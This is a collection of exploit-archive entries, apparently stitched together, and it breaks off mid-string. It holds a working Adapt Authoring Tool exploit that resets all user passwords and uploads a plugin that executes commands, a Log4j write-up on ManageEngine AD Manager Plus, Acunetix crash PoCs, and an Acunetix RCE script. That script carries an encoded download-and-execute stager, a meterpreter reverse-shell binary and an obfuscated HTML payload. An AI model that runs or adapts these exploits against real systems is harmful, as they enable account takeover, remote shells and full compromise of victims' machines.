print("[+] Reset every password to HaXX0r3d!")
def create_plugin(plugin_name):
manifest = {
"name": plugin_name,
"version": "1.0.0",
"extension": "exploit",
"main": "/js/main.js",
"displayName": "exploit",
"keywords": ["adapt-plugin", "adapt-extension"],
"scripts": {"adaptpostcopy": "/scripts/postcopy.js"},
}
property = {
"properties": {
"pluginLocations": {
"type": "object",
"properties": {"course": {"type": "object"}},
}
}
}
payload = textwrap.dedent(
f"""
const {{ exec }} = require("child_process");
module.exports = async function (fs, path, log, options, done) {{
try {{
exec("{args.command}");
}} catch (err) {{
log(err);
}}
done();
}};
"""
).strip()
plugin = io.BytesIO()
with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
zip_file.writestr(
f"{plugin_name}/bower.json",
io.BytesIO(json.dumps(manifest).encode()).getvalue(),
)
zip_file.writestr(
f"{plugin_name}/properties.schema",
io.BytesIO(json.dumps(property).encode()).getvalue(),
)
zip_file.writestr(
f"{plugin_name}/js/main.js", io.BytesIO("".encode()).getvalue()
)
zip_file.writestr(
f"{plugin_name}/scripts/postcopy.js",
io.BytesIO(payload.encode()).getvalue(),
)
plugin.seek(0)
return plugin
def find_plugin(cookies, plugin_type, plugin_name):
res = requests.get(f"{args.url}/api/{plugin_type}type", cookies=cookies)
for plugin in json.loads(res.text):
if plugin["name"] == plugin_name:
return plugin["_id"]
return None
def create_course(cookies):
data = {}
res = requests.post(f"{args.url}/api/content/course", cookies=cookies, json=data)
course_id = json.loads(res.text)["_id"]
data = {"_courseId": course_id, "_parentId": course_id}
res = requests.post(
f"{args.url}/api/content/contentobject",
cookies=cookies,
json=data,
)
content_id = json.loads(res.text)["_id"]
data = {"_courseId": course_id, "_parentId": content_id}
res = requests.post(f"{args.url}/api/content/article", cookies=cookies, json=data)
article_id = json.loads(res.text)["_id"]
data = {"_courseId": course_id, "_parentId": article_id}
res = requests.post(f"{args.url}/api/content/block", cookies=cookies, json=data)
block_id = json.loads(res.text)["_id"]
component_id = find_plugin(cookies, "component", "adapt-contrib-text")
data = {
"_courseId": course_id,
"_parentId": block_id,
"_component": "text",
"_componentType": component_id,
}
requests.post(f"{args.url}/api/content/component", cookies=cookies, json=data)
return course_id
def rce(users):
session_cookie = None
for user in users:
if user["role"] == "Super Admin":
session_cookie = get_session_cookie(user["email"], "HaXX0r3d!")
break
if session_cookie is None:
print("[-] Failed to login as Super Account")
sys.exit()
plugin_name = "adapt-contrib-xapi"
print(f"[+] Create malicious plugin : {plugin_name}")
plugin = create_plugin(plugin_name)
print("[+] Scan installed plugins")
plugin_id = find_plugin(session_cookie, "extension", plugin_name)
if plugin_id is None:
print(f"[+] {plugin_name} not found")
else:
print(f"[+] Found {plugin_name}")
print(f"[+] Remove {plugin_name}")
requests.delete(
f"{args.url}/api/extensiontype/{plugin_id}",
cookies=session_cookie,
)
print("[+] Upload plugin")
files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
requests.post(
f"{args.url}/api/upload/contentplugin",
cookies=session_cookie,
files=files,
)
print("[+] Find uploaded plugin")
plugin_id = find_plugin(session_cookie, "extension", plugin_name)
if plugin_id is None:
print(f"[-] {plugin_name} not found")
sys.exit()
print(f"[+] Plugin ID : {plugin_id}")
print("[+] Add plugin to new courses")
data = {"_isAddedByDefault": True}
requests.put(
f"{args.url}/api/extensiontype/{plugin_id}",
cookies=session_cookie,
json=data,
)
print("[+] Create a new course")
course_id = create_course(session_cookie)
print("[+] Build course")
res = requests.get(
f"{args.url}/api/output/adapt/preview/{course_id}",
cookies=session_cookie,
)
if res.status_code == 200:
print("[+] Command execution succeeded")
else:
print("[-] Command execution failed")
print("[+] Remove course")
requests.delete(
f"{args.url}/api/content/course/{course_id}",
cookies=session_cookie,
)
def main():
print("[*] Retrieve user information")
users = get_users()
print("\n[*] Reset password")
reset_password(users)
print("\n[*] Perform remote code execution")
rce(users)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-u",
dest="url",
help="Site URL (e.g. www.adaptlearning.org)",
type=str,
required=True,
)
parser.add_argument(
"-U",
dest="username",
help="Username to authenticate as",
type=str,
required=True,
)
parser.add_argument(
"-P",
dest="password",
help="Password for the specified username",
type=str,
required=True,
)
parser.add_argument(
"-c",
dest="command",
help="Command to execute (e.g. touch /tmp/pwned)",
type=str,
default="touch /tmp/pwned",
)
args = parser.parse_args()
main()
# Exploit Title: AD Manager Plus 7122 - Remote Code Execution (RCE)
# Exploit Author: Chan Nyein Wai & Thura Moe Myint
# Vendor Homepage: https://www.manageengine.com/products/ad-manager/
# Software Link: https://www.manageengine.com/products/ad-manager/download.html
# Version: Ad Manager Plus Before 7122
# Tested on: Windows
# CVE : CVE-2021-44228
# Github Repo: https://github.com/channyein1337/research/blob/main/Ad-Manager-Plus-Log4j-poc.md
### Description
In the summer of 2022, I have been doing security engagement on Synack
Red Team in the collaboration with my good friend (Thura Moe Myint).
At that time, Log4j was already widespread on the internet. Manage
Engine had already patched the Ad Manager Plus to prevent it from
being affected by the Log4j vulnerability. They had mentioned that
Log4j was not affected by Ad Manager Plus. However, we determined that
the Ad Manager Plus was running on our target and managed to exploit
the Log4j vulnerability.
### Exploitation
First, Let’s make a login request using proxy.
Inject the following payload in the ```methodToCall``` parameter in
the ```ADSearch.cc``` request.
Then you will get the dns callback with username in your burp collabrator.
### Notes
When we initially reported this vulnerability to Synack, we only
managed to get a DNS callback and our report was marked as LDAP
injection. However, we attempted to gain full RCE on the host but were
not successful. Later, we discovered that Ad Manager Plus was running
on another target, so we tried to get full RCE on that target. We
realized that there was a firewall and an anti-virus running on the
machine, so most of our payloads wouldn't work. After spending a
considerable amount of time , we eventually managed to bypass the
firewall and anti-virus, and achieve full RCE.
### Conclusion
We had already informed Zoho about the log4j vulnerability, and even
after it was fixed, they decided to reward us with a bonus bounty for
our report.
### Mitigation
Updating to a version of Ad Manager Plus higher than 7122 should
resolve the issue.
# Exploit Title: Acunetix WVS Reporter 10.0 - Denial of Service (PoC)
# Exploit Author: Ali Alipour
# Date: 2018-08-22
# Vendor Homepage : https://www.acunetix.com/
# Tested on : Windows 10 - 64-bit
# Steps to Reproduce
# Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the Acunetix WVS Reporter 10.0 program.
# In the new window click "Report Preview" > "Load Report".
# And upload a sample report >> Then click on the print button .
# Now Paste the content of "exploit.txt" into the field: " Pages ".
# Click "OK" and you will see a Crash.
#!/usr/bin/python
buffer = "A" * 20
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title : Acunetix Web Vulnerability Scanner 10.0 Build 20150623 - Denial of Service (PoC)
# Discovery by: Javier Enrique Rodriguez Gutierrez
# Discovery Date : 2018-08-11
# Vendor Homepage: https://www.acunetix.com
# Tested Version : 10.0
# Vulnerability Type : Denial of Service (PoC)
# Tested on OS : Windows 10 PRO x86 en
# 1 . run python code : python generate.py
# 2 . open generate.txt and copy content to clipboard
# 3 . open "Acunetix Web Vulnerability Scanner 10.0"
# 4 . from Tools Explorer --> subdomain scanner
# 5 . Paste ClipBoard on "Domain"
# 6 . Click start
# 7 . Crashed
#!/usr/bin/env python
# -*- coding: utf-8 -*-
buffer = "\x41" * 2769
f = open ("generate.txt", "w")
f.write(buffer)
f.close()
'''
Acunetix WVS 10 - Remote command execution (SYSTEM privilege)
- Author: Daniele Linguaglossa
Overview
=========
Acunetix WVS 10 [1] is an enterprise web vulnerability scanner developer by Acunetix Inc.
Two major flaws exists in the last version of Acunetix, these bug allow a remote attacker,
to execute command in the context of application with SYSTEM privilege.
Details
==========
A first flaw exists in the way Acunetix render some html elements inside gui, in fact it
uses jscript.dll without any concert about unsafe ActiveX object such as WScript.shell.
If acunetix trigger a vulnerability during a scan session it saves a local html with the
content of html page, so is possibile to trigger a fake vulnerability and insert a js
which trigger the remote command execution.
The second flaw it's about the Acunetix scheduler [2], the scheduler just allow to scan
websites programmatically without any user interaction, is possible to schedule scan
via the web interface on 127.0.0.1:8183 .
like any scan Acunetix, will perform some tests on the targeted Host before real scan,
these test are executed upon some script into folder
C:\ProgramData\Acunetix WVS 10\Data\Scripts
icacls show a bad privileges in this folder, so any user (even guest) will be able to
replace these custom checks with own ones (Remember first flaw with jscript.dll) :D
C:\ProgramData\Acunetix WVS 10\Data>icacls Scripts
Scripts Everyone:(OI)(CI)(M)
Everyone:(I)(OI)(CI)(M)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA) <---- UNSAFE [3]
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
C:\ProgramData\Acunetix WVS 10\Data>
With this two flaws in mind i wrote a small exploit which is able to obtain RCE via
a meterpreter shell, anyway there are some requirement:
1) Target must have VBS script interpreter
2) Target must have the scheduler service
3) Target must be Windows
Exploit
==========
https://github.com/dzonerzy/acunetix_0day
https://www.youtube.com/watch?v=gWcRlam59Fs (video proof)
Solution
==========
Jscript should be used with limited ActiveX, and permission on C:\ProgramData\Acunetix WVS 10\Data
must be fixed!
Footnotes
_________
[1] http://www.acunetix.com/
[2] http://www.acunetix.com/support/docs/wvs/scheduling-scans/
[3] https://support.microsoft.com/it-it/kb/919240
'''
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Acunetix 0day SYSTEM Remote Command Execution by Daniele Linguaglossa
This PoC exploit 2 vulnerability in Acunetix core , the first one is a RCE (Remote Command Exec) and the second one is
a LPE (Local Privilege Escalation).
All credits for this exploit goes to Daniele Linguaglossa
"""
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from random import randint
from threading import Thread
from time import sleep
import binascii
import sys
import base64
import os
server = None
def gen_random_name(size):
alphabet = "abcdefghilmnopqrstuvzABCDEFGHILMNOPQRSTUVZ0123456789"
name = ""
for i in range(0, size):
name += alphabet[randint(0, len(alphabet) - 1)]
return name + ".vbs"
def ip2b(ip):
return "".join(binascii.hexlify(chr(int(t))) for t in ip.split("."))
def postexploitation():
print "[*] Sleeping 1 minutes to elevate privileges...ZzZz"
sleep(70) # 2 minutes
global server
print "[!] Stopping server !"
server.shutdown()
print "[!] Exploit successful wait for session!"
# param URL,FILENAME
PAYLOAD_DOWNLOAD_EXEC = "dHNraWxsIHd2cw0KJGE9JycnDQogU2V0IGZzbyA9IENyZWF0ZU9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmpl" \
"Y3QiKQ0KIFNldCB3c2hTaGVsbCA9IENyZWF0ZU9iamVjdCggIldTY3JpcHQuU2hlbGwiICkNCiBTZXQgT3V0cCA9IFdz" \
"Y3JpcHQuU3Rkb3V0DQogU2V0IEZpbGUgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiTWljcm9zb2Z0LlhNTEhUVFAiKQ0K" \
"IEZpbGUuT3BlbiAiR0VUIiwgImh0dHA6Ly8lcy9zdGFnZTIiLCBGYWxzZQ0KIE15RmlsZSA9IHdzaFNoZWxsLkV4cGFu" \
"ZEVudmlyb25tZW50U3RyaW5ncyggIiVzIiApKyJcJXMiDQogRmlsZS5TZW5kDQogU2V0IEJTID0gQ3JlYXRlT2JqZWN0" \
"KCJBRE9EQi5TdHJlYW0iKQ0KIEJTLnR5cGUgPSAxDQogQlMub3Blbg0KIEJTLldyaXRlIEZpbGUuUmVzcG9uc2VCb2R5" \
"DQogQlMuU2F2ZVRvRmlsZSBNeUZpbGUsIDINCiB3c2hTaGVsbC5ydW4gIndzY3JpcHQgIitNeUZpbGUNCiBmc28uRGVs" \
"ZXRlRmlsZShXc2NyaXB0LlNjcmlwdEZ1bGxOYW1lKQ0KICcnJw0KICRwdGggPSAoZ2V0LWl0ZW0gZW52OlRFTVApLlZh" \
"bHVlKyJcc3RhZ2VyLnZicyI7DQogZWNobyAkYSA+ICRwdGgNCiB3c2NyaXB0ICRwdGg="
# param connect back IP
PAYLOAD_METERPETRER = "4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000000000" \
"0000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6" \
"e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010300e4fb66ef000" \
"0000000000000e0000f030b01023800020000000e000000000000001000000010000000200000000040000010000000" \
"020000040000000100000004000000000000000040000000020000463a0000020000000000200000100000000010000" \
"0100000000000001000000000000000000000000030000064000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e7" \
"465787400000028000000001000000002000000020000000000000000000000000000200030602e64617461000000" \
"900a000000200000000c000000040000000000000000000000000000200030e02e6964617461000064000000003000" \
"000002000000100000000000000000000000000000400030c000000000000000000000000000000000b800204000ff" \
"e090ff253830400090900000000000000000ffffffff00000000ffffffff0000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000009090909090909090909090" \
"90909090909090909090909090909090909033c0680810400064ff30648920fce8820000006089e531c0648b50308b" \
"520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b59" \
"2001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581" \
"c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89" \
"001000029c454506829806b00ffd56a0568%s680200115c89e6505050504050405068ea0fdfe0ffd5976a105657689" \
"9a57461ffd585c0740aff4e0875ece8610000006a006a0456576802d9c85fffd583f8007e368b366a4068001000005" \
"66a006858a453e5ffd593536a005653576802d9c85fffd583f8007d225868004000006a0050680b2f0f30ffd557687" \
"56e4d61ffd55e5eff0c24e971ffffff01c329c675c7c3bbf0b5a2566a0053ffd5190f4da8a063058eceb8f7b69074c" \
"4e814a3cae54e8172c60ead9604f2e86b0522895f543ebf148fad021d6146ace15f4ae3dbf55185e896fcaede21b0f" \
"db55831cbcfb72949f584986c13ebc8dd35971d7cee480354c83bf909ab61c53b4412733e4cd8dc788890915d41c0b" \
"2e06b529fe28c90a777a1a2ff95dc2a6bd697544d0462c01750e7f053c3ee2e1277d13515df7d3dc5ee57419630faf" \
"f6c066e12a8ef76cb84891bb64b347b905ceaea1850bc52542cb5a967d538e70d8e7c5335132befb4f87450a5ecdf2" \
"7ec89b1ed56e6beb044a950a8022ab5d46d5ba6f37655d35296ade2911292b5179f53d148dffee01672f90f1d82c22" \
"b5e253c2637ed99e71e796953a070483bb13cab540c00873b6f5788a1a6e58663cf9cf2ff46b92cbcdad9215a101fb" \
"54c71d2112151a19faec99fe5256fced9417f9673ddbb87439860eccedf31e528837cda1251b974f2808bdfc70cafa" \
"e32fb6335cdda22e19e64fde514b779dc932bb8249f8d8f260fd457b719980bb069a1ed560e2c74d85182c3aacd499" \
"df5dab0e0a0cee9e1da02cff7b89aac3f99de68badc83c9acf3c7518cf1578a58c131e1f3f36d393a7da0979f48115" \
"9d687cd9e3d5bc9fe3d34b9c7aa362be497402f21045d1aa7b871e773facc169649d8f64c0ac91d2feb85063169af8" \
"87973643f41f9b5c38b01cb2eb327e17d1d0f7f5e8693022c729f69b83723df61b9617f533cf919740edbb92ca86f9" \
"f1db8cdf696531559d41193f2356414df49a8e22790a7cb174079b5273c485e252296d690796649048410e29fc8a4d" \
"3d3384a98beb5bca12574510183cbaa49f1eee2e7712df55312a40c18e636efe4e7066034e50060e3dcfc5354dc9d9" \
"4b570a97d0b47eadc715effc165f9660797fc3ed75d5940262419d75ea5670a029774fa83b5818a7d46a9764de62be" \
"e019444d30589d5d778499aaa0b3d10e7897d26fc5e446eb358c7067df52636d8a2ba7340f40e0c263522bb494500d" \
"c73585ee9208e29ac7cdf591316712f1624116dc48ebe2c9fa5743e1e4519f82b8be65db56c09e6ef563286050decd" \
"f9b327481b045b2073ea4e52ba5c6bb066c2f02709effd1db019cba7b8b682f16749d12ca8c89230edbbecfd59bf51" \
"11ea1e6c9ed24ec62bcc37bff84195329a97a41354be5f297dd0edc868edbd35c528f79b9debf6a132b0ee1c140151" \
"a90f0c6145149b01e6f55b7e6cc24f015a0f98627fee12834bcf368458827c4c824b1968aa4df58188c5909a95df1f" \
"288c88326ee731d240159bba27397cc8b0fe4995ac6445a9033279af56f156d22416b8915f5b64a1acca60e4c1c6b8" \
"f33af7431ed674bd62b6b26613cad5f9c9d395c95ee9acc56aacd0f4ea4e198fb6e061d012c91ffa99ecdc1510099f" \
"8a4d4fc45273e6687be92c729b719692bb5e197083c4f4b77a1df988cd81141686743fe0e1ace050dec96c0fd8d75e" \
"7182ea3cfc0f13c5cf804a8264c67166495837b6da837bb7e382527f63db2f94c75af6c855162aeb3b8a2c362819b9" \
"b1d586db76faa0c06346149d2c88379cf186e36056669d4e7cc433cb8205dd0d058c2f6ae74111eeaa6a5883b14e74" \
"482d130a665e53b6e89020d600be481779ee7b97631b897608d6933c65fcfc4f630dabe2d0dbad0af7c614d81b679d" \
"619ce6a7eefbf94664a40e4772f540dc1964a979f4c25e125844c2a7075f6a6f5fae46dada35d3e83f82d03f87b11e" \
"cfb4bf6636d727cf99dae040b8dd3c7abcdb98eabb7e71b56348ce6a3c635299efebc81690288bbab0f6cad2ebfd2a" \
"a3d7aa74724b97be8ff3f360017970203ed71039a06799828f0455620fe432ef1dbb79cb87478c6d67e177fa72cbc0" \
"c1422a65197e33ee6a4b314992beb18cbaa3bcd00f43cc2749ed61c8d8cb38f512bee5bdb4d4574c0c56b91da064bd" \
"5c358dab92d2431b3c90938b4d0ec9661c2e9c98942585466ff7f0a7a5b5b56d825673b46966750cedce33eb0de118" \
"c5c4211b1bfc6d297d5d48205ac40a8f47b78988807fa9d312465c1c080b158c01267965e443de442716d3fe8ac029" \
"7640ef6d5632eaa784cf2b2b7a884d0589c93d69f8f8d7c6dc2b75a0825c0c5e892268cf3af3843004dc68dd05d367" \
"6ac0b218d9adc3ecca734fe7fa61de3272584ed349fffa669175cd8a873b72b7dce3cb4a8e8afa8ddbba2039219220" \
"6e9dc808a2ac3f2b6909e71321437b8979f26b9a8bda1fde661229544cb34ebc3ce7a4e0c05d340ba65457c67c3d61" \
"5d249af5d333ab3894045480fa8bb3b6c75a41ed9dd00ec8367c68cd41b2b03caa30fc527a00d94b3c25620813ac9d" \
"522e6e86cfee45a4f711171ec17f167abc0c4abb6c80de587bb790a1f83b9428d8380832a8216a6b8ea47cac624a24" \
"ca171c95ebb6d81bd7676eff464d56436d32b66bb3d190e44e66beb412bd7d5d8978d7e0e93bb0e9f08944a6c45b4a" \
"b5e493e0dd1491352d8078b0a3bae30bc2c145bc4e5f9dfd9b457d5dd8ff9c635031b02e7f3b8927b09460b983883a" \
"dbb42bdff6f8c017b5096ce7d5a72ab620504be21555aa86871ee9e4887657b8e72d8813b429428596839d00c3e44f" \
"fe5297ce95fc340278d1d805370c54f64615db34797f523f0a4cd2523d10d1a1b62146051db23668bc482d802b66bf" \
"962f511ec6af7204cbb8d474204bf5c9e52ce0cfbd6298cf96f619a5d64827ba3284b25135965a9062f3cd7eb93745" \
"390e9cc983c9a54ec731699bbda53958382cbb2e2ecd3247b18e5c3d64755c0d1e112e8375b5795afdfee8b69879c8" \
"6597f79b6df2624dbe59557e8d13918c2d28c91c3a4f49a8682b62648259d118ffa02b2218efa031b45fd54c0b8d14" \
"23d494b0a5da8e97ec345e17f9db32e9bec5cbcc36357b4ba8e7b8ccddc192d360d99a1e805dedc0ecadca15a0334f" \
"680b0a9e91e12698ba69d27d86b2394c3d91682194ba312e8aef801a9ebc8722af9e8bd1180c0eed3137bfe109b06c" \
"a442777eae4e1a145302152777da0a0a1decef0e0c73f2709cdb61360961eb1fc47cec9a893b9a8b2ec9f5a7fcce3e" \
"178b459a54d9c5e40c6aada77896a7ee9054324019fe61e954c60dfd7bc895011c951e09fc195e779b71fc33833cdb" \
"a5fe76ceb9a7b6ba5a39ed2e80c5d91b15cef0e1f5cb956b90e6db947fa45a4ae0e668b72a056dd29ea81c8b3aa126" \
"b35d40c6dfa042cbd19c42b7ef44e6ef7b35952dbc796097530a04a71a3c116e99bf4a4ae8199685cc7e1e9f03a1ce" \
"a8eb6d579e1e2ae0800000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"00000002c3000000000000000000000543000003830000000000000000000000000000000000000000000000000000" \
"040300000000000000000000040300000000000009c004578697450726f63657373000000003000004b45524e454c3" \
"3322e646c6c00000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"17aa9f565fccd8ce423701840cda9828320ce06749de816ae27196bce0849d1b494f89ffd49"
# param CMD => PAYLOAD_DOWNLOAD_EXEC
EXPLOIT_STAGE_1 = "PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5PjxzY3JpcHQ+d2luZG93LmFsZXJ0ID0genl4O3dpbmRvdy5wcm9tcHQgPSB6eXg7d" \
"2luZG93LmNvbmZpcm0gPSB6eXg7d2luZG93LmNhbGxlZCA9IDA7ZnVuY3Rpb24genl4KCl7d2luZG93LmNhbGxlZCA9IDE7dm" \
"FyIHh5ej0iJXMiO2V2YWwoZnVuY3Rpb24ocCxhLGMsayxlLGQpe2U9ZnVuY3Rpb24oYyl7cmV0dXJuIGMudG9TdHJpbmcoMzY" \
"pfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKXtkW2MudG9TdHJpbmcoYSldPWtbY118fGMudG9TdHJp" \
"bmcoYSl9az1bZnVuY3Rpb24oZSl7cmV0dXJuIGRbZV19XTtlPWZ1bmN0aW9uKCl7cmV0dXJuJ1xcdysnfTtjPTF9O3doaWxlK" \
"GMtLSl7aWYoa1tjXSl7cD1wLnJlcGxhY2UobmV3IFJlZ0V4cCgnXFxiJytlKGMpKydcXGInLCdnJyksa1tjXSl9fXJldHVybi" \
"BwfSgnNSAwPTYgNCgiMy4xIik7MC4yKFwnNyAvOCBkIC9lICIiICJjIiAtYiA5IC1hICJmIlwnKTsnLDE2LDE2LCdceDczXHg" \
"2OFx4NjVceDZjXHg2Y3xceDUzXHg2OFx4NjVceDZjXHg2Y3xceDcyXHg3NVx4NmV8XHg1N1x4NTNceDYzXHg3Mlx4NjlceDcw" \
"XHg3NHxceDQxXHg2M1x4NzRceDY5XHg3Nlx4NjVceDU4XHg0Zlx4NjJceDZhXHg2NVx4NjNceDc0fHZhcnxuZXd8XHg2M1x4N" \
"mRceDY0fEN8Tm9ybWFsfFx4NjVceDZlXHg2M1x4NmZceDY0XHg2NVx4NjRceDYzXHg2Zlx4NmRceDZkXHg2MVx4NmVceDY0fH" \
"dpbmRvd1x4NzNceDc0XHg3OVx4NmNceDY1fFx4NzBceDZmXHg3N1x4NjVceDcyXHg3M1x4NjhceDY1XHg2Y1x4NmN8XHg3M1x" \
"4NzRceDQxXHg1Mlx4NzR8QnwkJCcucmVwbGFjZSgiJCQiLHh5eikuc3BsaXQoJ3wnKSwwLHt9KSk7ZG9jdW1lbnQuYm9keS5p" \
"bm5lckhUTUw9JzQwNCBOb3QgZm91bmQnO308L3NjcmlwdD4lczxzY3JpcHQ+aWYgKHdpbmRvdy5jYWxsZWQgPT0gMCl7enl4K" \
"Ck7fTwvc2NyaXB0PjwvYm9keT48L2h0bWw+"
LOGIN_FORM = "PHN0eWxlPg0KYm9keXsNCiAgbWFyZ2luOiAwcHg7DQogIHBhZGRpbmc6IDBweDsNCiAgYmFja2dyb3VuZDogIzFhYmM5ZDsNCn0NCg" \
"0KaDF7DQogIGNvbG9yOiAjZmZmOw0KICB0ZXh0LWFsaWduOiBjZW50ZXI7DQogIGZvbnQtZmFtaWx5OiBBcmlhbDsNCiAgZm9udC13Z" \
"WlnaHQ6IG5vcm1hbDsNCiAgbWFyZ2luOiAyZW0gYXV0byAwcHg7DQp9DQoub3V0ZXItc2NyZWVuew0KICBiYWNrZ3JvdW5kOiAjMTMy" \
"MDJjOw0KICB3aWR0aDogOTAwcHg7DQogIGhlaWdodDogNTQwcHg7DQogIG1hcmdpbjogNTBweCBhdXRvOw0KICBib3JkZXItcmFkaXV" \
"zOiAyMHB4Ow0KICAtbW96LWJvcmRlci1yYWRpdXM6IDIwcHg7DQogIC13ZWJraXQtYm9yZGVyLXJhZGl1czogMjBweDsNCiAgcG9zaXR" \
"pb246IHJlbGF0aXZlOw0KICBwYWRkaW5nLXRvcDogMzVweDsNCn0NCg0KLm91dGVyLXNjcmVlbjpiZWZvcmV7DQogIGNvbnRlbnQ6IC" \
"IiOw0KICBiYWNrZ3JvdW5kOiAjM2U0YTUzOw0KICBib3JkZXItcmFkaXVzOiA1MHB4Ow0KICBwb3NpdGlvbjogYWJzb2x1dGU7DQogI" \
"GJvdHRvbTogMjBweDsNCiAgbGVmdDogMHB4Ow0KICByaWdodDogMHB4Ow0KICBtYXJnaW46IGF1dG87DQogIHotaW5kZXg6IDk5OTk" \
"7DQogIHdpZHRoOiA1MHB4Ow0KICBoZWlnaHQ6IDUwcHg7DQp9DQoub3V0ZXItc2NyZWVuOmFmdGVyew0KICBjb250ZW50OiAiIjsNCi" \
"AgYmFja2dyb3VuZDogI2VjZjBmMTsNCiAgd2lkdGg6IDkwMHB4Ow0KICBoZWlnaHQ6IDg4cHg7DQogIHBvc2l0aW9uOiBhYnNvbHV0Z" \
"TsNCiAgYm90dG9tOiAwcHg7DQogIGJvcmRlci1yYWRpdXM6IDBweCAwcHggMjBweCAyMHB4Ow0KICAtbW96LWJvcmRlci1yYWRpdXM6" \
"IDBweCAwcHggMjBweCAyMHB4Ow0KICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDBweCAwcHggMjBweCAyMHB4Ow0KfQ0KDQouc3RhbmR" \
"7DQogIHBvc2l0aW9uOiByZWxhdGl2ZTsgIA0KfQ0KDQouc3RhbmQ6YmVmb3Jlew0KICBjb250ZW50OiAiIjsNCiAgcG9zaXRpb246IG" \
"Fic29sdXRlOw0KICBib3R0b206IC0xNTBweDsNCiAgYm9yZGVyLWJvdHRvbTogMTUwcHggc29saWQgI2JkYzNjNzsNCiAgYm9yZGVyL" \
"WxlZnQ6IDMwcHggc29saWQgdHJhbnNwYXJlbnQ7DQogIGJvcmRlci1yaWdodDogMzBweCBzb2xpZCB0cmFuc3BhcmVudDsNCiAgd2lkd" \
"Gg6IDIwMHB4Ow0KICBsZWZ0OiAwcHg7DQogIHJpZ2h0OiAwcHg7DQogIG1hcmdpbjogYXV0bzsNCn0NCg0KLnN0YW5kOmFmdGVyew0K" \
"ICBjb250ZW50OiAiIjsNCiAgcG9zaXRpb246IGFic29sdXRlOw0KICB3aWR0aDogMjYwcHg7DQogIGxlZnQ6IDBweDsNCiAgcmlnaHQ6" \
"IDBweDsNCiAgbWFyZ2luOiBhdXRvOw0KICBib3JkZXItYm90dG9tOiAzMHB4IHNvbGlkICNiZGMzYzc7DQogIGJvcmRlci1sZWZ0OiA" \
"zMHB4IHNvbGlkIHRyYW5zcGFyZW50Ow0KICBib3JkZXItcmlnaHQ6IDMwcHggc29saWQgdHJhbnNwYXJlbnQ7DQogIGJvdHRvbTogLT" \
"E4MHB4Ow0KICBib3gtc2hhZG93OiAwcHggNHB4IDBweCAjN2U3ZTdlDQp9DQoNCi5pbm5lci1zY3JlZW57DQogIHdpZHRoOiA4MDBwe" \
"DsNCiAgaGVpZ2h0OiAzNDBweDsNCiAgYmFja2dyb3VuZDogIzFhYmM5ZDsNCiAgbWFyZ2luOiAwcHggYXV0bzsNCiAgcGFkZGluZy10" \
"b3A6IDgwcHg7DQp9DQoNCi5mb3Jtew0KICB3aWR0aDogNDAwcHg7DQogIGhlaWdodDogMjMwcHg7DQogIGJhY2tncm91bmQ6ICNlZGV" \
